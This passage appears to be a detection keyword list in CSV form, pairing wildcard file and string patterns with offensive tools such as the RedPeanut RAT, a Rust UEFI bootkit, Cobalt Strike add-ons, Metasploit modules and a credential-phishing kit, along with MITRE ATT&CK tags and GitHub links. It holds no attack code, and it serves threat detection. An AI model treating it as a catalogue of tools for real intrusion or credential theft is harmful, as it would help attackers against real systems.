-*redis-rce*,offensive_tool_keyword,redis-rce,A exploit for Redis 4.x/5.x RCE. 
inspired by Redis post-exploitation.,T1210 - T1211 - T1021 - T1059,TA0002 - TA0011 - TA0003,N/A,N/A,Exploitation tools,https://github.com/Ridter/redis-rce,1,0,N/A,N/A,9,856,216,2021-11-30T14:55:59Z,2019-07-08T14:05:30Z
-*redlotus.efi*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z
-*RedPeanut Smb server started*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanut.Models*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*redpeanut.pfx*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanut.Resources.*.txt,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z 
-*RedPeanut.Utility*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutAgent.C2*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutAgent.Core*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutAgent.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutAgent.Evasion*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutAgent.Execution*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutAgent.Program*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutC2*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutCLI*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutDBContext*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutDBInitializer*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutHtaPowerShellScript*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 
4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutHtaScript.hta*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutInstallUtil.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutMigrate.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutMSBuildScript.xml*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z 
-*RedPeanutPowershellScriptS*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutRP.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutShooter.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutSpawn.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutSpawnTikiTorch.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedPeanutVBAMacro.vba*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RedSiege/CIMplant*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z
-*redskal/SharpAzbelt*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,1,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z
-*redsocks-fw.sh stop*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z
-*Red-Team-Infrastructure-Wiki.*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 
- TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z
-*Red-Teaming-Toolkit*,offensive_tool_keyword,Red-Teaming-Toolkit,A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request,T1210 - T1211 - T1212 - T1547,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/infosecn1nja/Red-Teaming-Toolkit,1,1,N/A,N/A,10,7958,2071,2023-06-01T08:38:39Z,2018-04-26T13:35:09Z
-*RedTeamOperations*,offensive_tool_keyword,Github Username,Red team exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/RedTeamOperations,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*RedWarden.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z
-*RedWarden.test*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z
-*redwarden_access.log*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z
-*redwarden_redirector.log*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z
-*ReelPhish*,offensive_tool_keyword,ReelPhish,ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). 
Credentials will be submitted by the web browser,T1566 - T1114 - T1071 - T1547 - T1546,TA0001 - TA0003 - TA0008,N/A,N/A,Phishing,https://github.com/fireeye/ReelPhish,1,0,N/A,N/A,5,493,156,2023-08-11T01:40:07Z,2018-02-01T20:35:11Z
-*reflct_dll_inject.exe*,offensive_tool_keyword,darkarmour,Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.,T1055.012 - T1027 - T1564.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/darkarmour,1,1,N/A,10,7,644,119,2020-04-13T10:56:23Z,2020-04-06T20:48:20Z
-*reflective_assembly_minified.ps1*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,,
-*reflective_dll.dll*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z
-*reflective_dll.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*reflective_dll.x64.dll*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,1,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z
-*reflective_dll.x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*reflective_dll_inject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*reflective_pe_loader.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ReflectiveDll.*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*ReflectiveDll.x64.dll*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 